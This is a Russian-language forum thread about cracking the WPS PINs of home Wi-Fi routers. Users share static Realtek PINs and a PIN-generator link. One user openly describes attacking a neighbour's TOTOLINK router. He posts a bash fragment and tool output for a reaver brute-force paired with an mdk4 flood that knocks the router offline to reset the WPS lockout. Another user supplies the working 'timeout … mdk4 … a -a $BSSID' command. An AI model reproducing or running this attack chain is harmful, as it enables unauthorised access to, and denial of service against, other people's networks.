Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,418
    Likes Received:
    9,120
    Reputations:
    115
    Открывается пустым пином через Router Scan (беспроводным аудитом, вкладка Wireless).
     
    Triton_Mgn, TOX1C, Payer and 2 others like this.
  2. Release the Kraken

    Joined:
    12 Apr 2019
    Messages:
    36
    Likes Received:
    5
    Reputations:
    0
    Так, а как ввести пустой пин?
     
  3. Release the Kraken

    Joined:
    12 Apr 2019
    Messages:
    36
    Likes Received:
    5
    Reputations:
    0
    Тааак
    Выражаю благодарность Бинарному мастеру.
    Даж не за помощь а за напоминание о том что можно снова воспользоватся РутерСкан

    Помню когда то давно начинал осваивать с него аудит. И он помог открыть первый доступ, потом перешел на Кали. И забыл про Рутерскан, даже не забыл, а просто использовал его в информационных целях, глянуть что за ситуация в округе.
    А зря. Ситуация поменялась с моих первых аудитов. И снова прошелся по точкам. Короче Серком 6688 и Empty WPS pin
     
    WELK, TOX1C, 4Fun and 1 other person like this.
  4. Piligrim740

    Piligrim740 Well-Known Member

    Joined:
    14 Aug 2016
    Messages:
    698
    Likes Received:
    4,889
    Reputations:
    15
    Аналогичная ситуация, не могу подобрать пин WPS к Tenda с МАС 58:D9:D5:24:FD:A1
    Сейчас WPS разлочен, не хотелось бы его грохнуть в Lock
    Подскажите, есть ли решение WPS для этих роутеров.

    RS показывает Realtek Wireless AP
    Эти пины уже пробовал :
    95661469 | Статичный PIN - Realtek 1
    95719115 | Статичный PIN - Realtek 2
    48563710 | Статичный PIN - Realtek 3
    50994953 | Airocon Realtek

    Не подходят, что меня ужасно расстроило.
    Пасс на точке жутко вредный, выкладывал на перебор - глухо :mad:
    Подскажите, кто владеет информацией.
     
    4Fun likes this.
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,418
    Likes Received:
    9,120
    Reputations:
    115
    В телеграм чате Router Scan есть человек, который исследовал закономерности пинов на этих устройствах. Возможно тебе надо связаться с ним.

    Вот посмотри: https://github.com/drygdryg/TendaOnlinePIN
     
    4Fun, USER_X, Piligrim740 and 2 others like this.
  6. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    961
    Likes Received:
    1,621
    Reputations:
    19
    10 попыток и уход в блокировку, после перезагрузки блокировка слетает.
    Для 58:D9:D5 ситуация осложняется тем, что их в базах 3wifi очень мало, и даже приблизительно собрать "поляну устройств", чтобы примерно подгадать пинкод, для них вряд ли получится.

    Генератор по ссылке выше практически бесполезен, для "устройства через одно" он предложил 40 пинкодов, и это только один раз. Для остальных 30 роутеров результата нет.
     
    USER_X, Monohrom, Piligrim740 and 3 others like this.
  7. Smiteboy

    Smiteboy New Member

    Joined:
    Wednesday
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Привет. Листал я в общем эту тему и нашел старенький скрипт для брута пинов WPS. Вот как он должен работать:
    - reaver брутфорсит пины пока тот не залочится
    - mdk3 дудосит роутер до перезагрузки и анлока wps
    - reaver продолжает свою работу

    Решил я юзнуть его на соседнем тотолинке с открытым wps, но каждый раз mdk3 выдавал что то по типу "роут неуязвим" и зацикливался на этом
    Code:
    AP 14:4D:67:98:9A:48 is responding!        
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with   500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  1000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  1500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  2000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  2500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  3000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  3500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  4000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  4500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  5000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  5500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  6000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  6500 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  7000 clients connected!
    AP 14:4D:67:98:9A:48 seems to be INVULNERABLE!  
    Device is still responding with  7500 clients connected!

    Прогнав скрипт еще пару раз я заметил то что ривер продолжает брутит новые пины, затем промониторил airodumo-ng и оказалось что еще как уязвим. Роутер отваливался с первых сек дудоса, хотя mdk3 почему то видел с ним связь. Дальше я прогнал его на других тотолинках (около меня их целых 4 штуки) и все также. То есть выходит брутить можно, но не охота сидеть вручную выходить с mdk3. Я попробовал применить к mdk ключ -c (не проверять на успешность), но он все так же зацикливался, просто без вывода в терминал.

    Дальше я скачал и переписал скрипт под mdk4, но там так же это не пофиксили, просто изменили текст вывода и убрали ключ -с
    Code:
    BSSID = 14:4D:67:98:9A:48
    [+] reaver is working ...
    
    Reaver v1.6.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [-] not associated
    [+] Associated with 14:4D:67:98:9A:48 (ESSID: TOTOLINK_N300RT)
    Pins
    02595672
    02605678
    02615677
    02625676
    02635675
    02645674
    02655673
    02665672
    02675671
    02685670
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    02695679
    [+] Mdk4 is working ...
    Connecting Client 00:30:65:37:D0:1E to target AP 14:4D:67:98:9A:48.
    Packets sent:      1 - Speed:    1 packets/sec
    Connecting Client 00:30:6E:46:4E:76 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:    427 - Speed:  426 packets/sec
    Connecting Client 00:50:DA:DA:A3:8B to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   1820 - Speed: 1393 packets/sec
    Connecting Client 00:02:44:5B:0D:5F to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   3466 - Speed: 1646 packets/sec
    Connecting Client 00:02:2D:2D:DB:2D to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   5100 - Speed: 1634 packets/sec
    Connecting Client 00:07:0E:0E:97:5F to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   6674 - Speed: 1574 packets/sec
    Connecting Client 00:01:E6:E8:D4:8B to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   8279 - Speed: 1605 packets/sec
    Connecting Client 00:50:08:76:2A:F8 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:   9910 - Speed: 1631 packets/sec
    Connecting Client 00:60:B3:8C:FB:FA to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  11537 - Speed: 1627 packets/sec
    Connecting Client 00:02:2D:2D:7A:56 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  13186 - Speed: 1649 packets/sec
    Connecting Client 00:30:BD:BD:00:95 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  14775 - Speed: 1589 packets/sec
    Connecting Client 00:01:38:FD:D2:7D to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  16400 - Speed: 1625 packets/sec
    Connecting Client 00:50:DA:11:24:8B to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  18013 - Speed: 1613 packets/sec
    Connecting Client 00:00:92:45:86:2A to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  19600 - Speed: 1587 packets/sec
    Connecting Client 00:08:21:72:1B:92 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  21181 - Speed: 1581 packets/sec
    Connecting Client 00:12:7F:EC:94:44 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  22817 - Speed: 1636 packets/sec
    Connecting Client 00:40:05:05:5E:8D to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  24446 - Speed: 1629 packets/sec
    Connecting Client 00:40:05:05:AC:91 to target AP 14:4D:67:98:9A:48 Status: No Response.
    Packets sent:  26040 - Speed: 1594 packets/sec

    Вот запуск mdk из скрипта, как можно в баш реализовать выход из цикла команды?
    Code:
    run_MDK4 (){
    echo [+] Mdk4 is working ...
    #gnome-terminal --geometry 10x10-1-1 --title='mdk4' -e "mdk4 wlan0mon a -a $BSSID -m"
    sleep 6                            #Время работы Mdk4
    killall mdk4 2> /dev/null
    echo [+] Mdk4 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]
    sleep 5
    }
    
    В идеале если бы mdk работал без проверки на связь с точкой, а просто отправил --clients клиетов и завершал работу.
     
  8. VasiliyP

    VasiliyP Well-Known Member

    Joined:
    30 Aug 2011
    Messages:
    234
    Likes Received:
    413
    Reputations:
    7
    Завершить mdk через фиксированное время?
    Всё, что внутри run_MDK4() заменить на
    timeout -s SIGKILL 5 mdk4 wlan0mon a -a $BSSID -m
    5 - это время в секундах на его работу
     
    binarymaster, Smiteboy and CRACK211 like this.
  9. Smiteboy

    Smiteboy New Member

    Joined:
    Wednesday
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    спасибо, its working ✌
     
Loading...